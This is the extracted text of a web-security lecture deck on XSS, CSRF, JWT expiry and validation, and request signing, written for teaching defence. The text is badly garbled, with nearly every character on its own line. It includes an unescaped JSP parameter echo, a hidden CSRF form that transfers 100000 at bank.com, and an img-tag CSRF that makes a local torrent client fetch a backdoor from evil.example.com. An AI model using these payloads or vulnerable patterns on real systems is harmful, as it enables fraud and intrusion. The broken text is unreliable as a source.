11. Intermezzo: XSS and CSRF
XSS
Someone is able to have their scripts executed as part of your web
application.
<
% S
t
r
i
n
g e
i
d = r
e
q
u
e
s
t
.
g
e
t
P
a
r
a
m
e
t
e
r
(
"
e
i
d
"
)
; %
>
.
.
.
E
m
p
l
o
y
e
e I
D
: <
%
= e
i
d %
>
12. Intermezzo: XSS and CSRF
CSRF
Someone else's web application secretly lets its visitors perform
actions with your web application due to cookies still present from
previous visits.
<
f
o
r
m a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
b
a
n
k
.
c
o
m
/
t
r
a
n
s
f
e
r
.
d
o
" m
e
t
h
o
d
=
"
P
O
S
T
"
>
<
i
n
p
u
t t
y
p
e
=
"
h
i
d
d
e
n
" n
a
m
e
=
"
a
c
c
t
" v
a
l
u
e
=
"
M
A
R
I
A
"
/
>
<
i
n
p
u
t t
y
p
e
=
"
h
i
d
d
e
n
" n
a
m
e
=
"
a
m
o
u
n
t
" v
a
l
u
e
=
"
1
0
0
0
0
0
"
/
>
<
i
n
p
u
t t
y
p
e
=
"
s
u
b
m
i
t
" v
a
l
u
e
=
"
V
i
e
w m
y p
i
c
t
u
r
e
s
"
/
>
<
/
f
o
r
m
>
13. Intermezzo: XSS and CSRF
p
r
i
n
t "
<
h
t
m
l
>
"
p
r
i
n
t "
L
a
t
e
s
t c
o
m
m
e
n
t
:
"
p
r
i
n
t d
a
t
a
b
a
s
e
.
l
a
t
e
s
t
C
o
m
m
e
n
t
p
r
i
n
t "
<
/
h
t
m
l
>
"
14. Intermezzo: XSS and CSRF
<
i
m
g s
r
c
=
"
h
t
t
p
:
/
/
l
o
c
a
l
h
o
s
t
:
8
0
8
0
/
g
u
i
/
?
a
c
t
i
o
n
=
a
d
d
-
u
r
l
&
s
=
h
t
t
p
:
/
/
e
v
i
l
.
e
x
a
m
p
l
e
.
c
o
m
/
b
a
c
k
d
o
o
r
.
t
o
r
r
e
n
t
"
>
16. Defence against CSRF is straightforward
and durable
1. Check the origin and referer headers
2. Check for some other header you're setting, such as X‑
Requested‑With
See www.owasp.org
17. What happens when I change my
password?
{
"
a
l
g
"
: "
H
S
5
1
2
"
}
{
"
s
u
b
"
: "
1
"
,
"
a
d
m
i
n
"
: f
a
l
s
e
}
H
M
A
C
S
H
A
2
5
6
(
b
a
s
e
6
4
U
r
l
E
n
c
o
d
e
(
h
e
a
d
e
r
) + "
.
" +
b
a
s
e
6
4
U
r
l
E
n
c
o
d
e
(
p
a
y
l
o
a
d
)
,
s
e
c
r
e
t
)
18. When should a JWT expire?
As soon as possible, to prevent misuse for long periods
As late as possible, so that users don't have te re‑authenticate
all the time
19. When should a JWT expire?
Introduce a short‑lived token used for authentication per request
Introduce a long‑lived token used to generate a new short‑lived
token when needed
The long‑lived token is used in combination with a blacklist of
retracted tokens
20. Should I accept all "valid" JWTs?
No, because "none" is a valid algorithm
The key you use to check the signature should match the
algorithm
See https://auth0.com/blog/critical‑vulnerabilities‑in‑json‑web‑
token‑libraries/
21. What happens when I delete my
account?
{
"
a
l
g
"
: "
H
S
5
1
2
"
}
{
"
s
u
b
"
: "
1
"
,
"
a
d
m
i
n
"
: f
a
l
s
e
}
H
M
A
C
S
H
A
2
5
6
(
b
a
s
e
6
4
U
r
l
E
n
c
o
d
e
(
h
e
a
d
e
r
) + "
.
" +
b
a
s
e
6
4
U
r
l
E
n
c
o
d
e
(
p
a
y
l
o
a
d
)
,
s
e
c
r
e
t
)
22. How do I apply this idea to server‑to‑
server communication?
23. P
O
S
T /
a
p
i
/
s
e
s
s
i
o
n H
T
T
P
/
1
.
1
H
o
s
t
: 5
4
.
1
9
4
.
1
2
6
.
1
6
1
C
o
n
n
e
c
t
i
o
n
: k
e
e
p
-
a
l
i
v
e
C
o
n
t
e
n
t
-
L
e
n
g
t
h
: 3
1
A
c
c
e
p
t
: *
/
*
O
r
i
g
i
n
: h
t
t
p
:
/
/
5
4
.
1
9
4
.
1
2
6
.
1
6
1
X
-
R
e
q
u
e
s
t
e
d
-
W
i
t
h
: X
M
L
H
t
t
p
R
e
q
u
e
s
t
U
s
e
r
-
A
g
e
n
t
: M
o
z
i
l
l
a
/
5
.
0 (
M
a
c
i
n
t
o
s
h
; I
n
t
e
l M
a
c O
S X 1
0
_
1
2
_
0
) A
p
p
C
o
n
t
e
n
t
-
T
y
p
e
: a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
R
e
f
e
r
e
r
: h
t
t
p
:
/
/
5
4
.
1
9
4
.
1
2
6
.
1
6
1
/
l
o
g
i
n
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
: g
z
i
p
, d
e
f
l
a
t
e
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
: e
n
-
U
S
,
e
n
;
q
=
0
.
8
,
n
l
;
q
=
0
.
6
C
o
o
k
i
e
: J
S
E
S
S
I
O
N
I
D
=
3
7
A
A
2
A
8
5
6
9
3
E
2
5
5
3
1
5
D
5
3
2
C
8
4
5
F
D
E
4
7
B
{
"
u
s
e
r
n
a
m
e
"
:
"
a
"
,
"
p
a
s
s
w
o
r
d
"
:
"
a
"
}
27. G
E
T ?
l
i
f
e
c
y
c
l
e H
T
T
P
/
1
.
1
H
o
s
t
: e
x
a
m
p
l
e
b
u
c
k
e
t
.
s
3
.
a
m
a
z
o
n
a
w
s
.
c
o
m
A
u
t
h
o
r
i
z
a
t
i
o
n
: S
i
g
n
a
t
u
r
e
T
o
B
e
C
a
l
c
u
l
a
t
e
d
x
-
a
m
z
-
d
a
t
e
: 2
0
1
3
0
5
2
4
T
0
0
0
0
0
0
Z
x
-
a
m
z
-
c
o
n
t
e
n
t
-
s
h
a
2
5
6
:
e
3
b
0
c
4
4
2
9
8
f
c
1
c
1
4
9
a
f
b
f
4
c
8
9
9
6
f
b
9
2
4
2
7
a
e
4
1
e
4
6
4
G
E
T
/
l
i
f
e
c
y
c
l
e
=
h
o
s
t
:
e
x
a
m
p
l
e
b
u
c
k
e
t
.
s
3
.
a
m
a
z
o
n
a
w
s
.
c
o
m
x
-
a
m
z
-
c
o
n
t
e
n
t
-
s
h
a
2
5
6
:
e
3
b
0
c
4
4
2
9
8
f
c
1
c
1
4
9
a
f
b
f
4
c
8
9
9
6
f
b
9
2
4
2
7
a
e
4
1
e
4
6
4
x
-
a
m
z
-
d
a
t
e
:
2
0
1
3
0
5
2
4
T
0
0
0
0
0
0
Z
h
o
s
t
;
x
-
a
m
z
-
c
o
n
t
e
n
t
-
s
h
a
2
5
6
;
x
-
a
m
z
-
d
a
t
e
e
3
b
0
c
4
4
2
9
8
f
c
1
c
1
4
9
a
f
b
f
4
c
8
9
9
6
f
b
9
2
4
2
7
a
e
4
1
e
4
6
4
9
b
9
3
4
c
a
4
9
5
9
9
1
b
7
8
5
2
b
8
5